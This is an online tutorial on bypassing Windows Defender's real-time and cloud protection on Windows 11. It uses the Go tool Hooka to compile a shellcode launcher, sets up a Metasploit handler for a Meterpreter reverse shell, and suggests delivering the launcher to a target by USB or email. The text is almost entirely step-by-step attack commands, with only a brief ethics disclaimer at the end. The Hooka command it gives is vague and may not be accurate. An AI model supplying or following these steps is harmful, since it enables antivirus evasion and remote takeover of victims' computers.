Bypass Windows Defender 2024 (Real Time and Cloud Protection) with Hooka (Golang)
Introduction
In this tutorial, we will explore how to bypass Windows Defender on a Windows 11 machine using a tool called Hooka, written in Golang. This guide will walk you through the process of setting up and executing Hooka to create a shellcode launcher that establishes a Meterpreter reverse shell connection, all while evading the real-time and cloud protections of Windows Defender.
Step 1: Setting Up the Environment
Before you can use Hooka, ensure your environment is properly set up.
- Install Go: Download and install Go from the official website (https://golang.org/dl/).
- Clone Hooka Repository: Open your terminal and run the following command to clone the repository:
git clone https://github.com/D3Ext/Hooka.git
- Navigate to the Hooka Directory:
cd Hooka
- Install Dependencies: Make sure all dependencies are installed by running:
go mod tidy
Step 2: Compiling Hooka
Now that you have Hooka set up, you will need to compile it.
- Compile the Tool: Use the following command to build the executable:
go build -o hooka.exe main.go
- Check for Errors: Ensure there are no compilation errors. If there are issues, review your Go installation and dependencies.
Step 3: Generating the Shellcode Launcher
This step involves generating a shellcode launcher that can bypass Windows Defender.
- Run Hooka: Execute the compiled Hooka tool with the appropriate parameters to create the shellcode launcher. The exact command may vary, but it typically looks like this:
./hooka.exe -o shellcode_launcher.exe
- Verify Output: Confirm that shellcode_launcher.exe has been created successfully in your directory.
Step 4: Setting Up the Listener
To complete the reverse shell setup, you need to prepare your listener on a Kali machine.
- Open Metasploit: Start Metasploit Framework on your Kali machine.
- Use the Multi/Handler: Set up a handler to receive the incoming connection:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <Your_Kali_IP>
set LPORT <Your_Port>
exploit
Step 5: Executing the Shellcode Launcher
Now, you can execute the shellcode launcher on the target Windows 11 machine.
- Transfer the Launcher: Use any method to transfer shellcode_launcher.exe to the target machine (e.g., USB, email, etc.).
- Run the Launcher: Execute shellcode_launcher.exe on the target system.
- Monitor the Listener: Go back to your Kali machine and check if you receive a connection in Metasploit.
Conclusion
You have successfully learned how to bypass Windows Defender using Hooka and establish a Meterpreter reverse shell. This process highlights the importance of understanding security tools and their implications. Always use this knowledge ethically and within the bounds of the law.
Key Takeaways
- Ensure your environment is set up with Go and necessary dependencies.
- Compile Hooka to generate a shellcode launcher.
- Set up a listener in Metasploit to receive the reverse shell.
- Always conduct testing in controlled environments for educational purposes.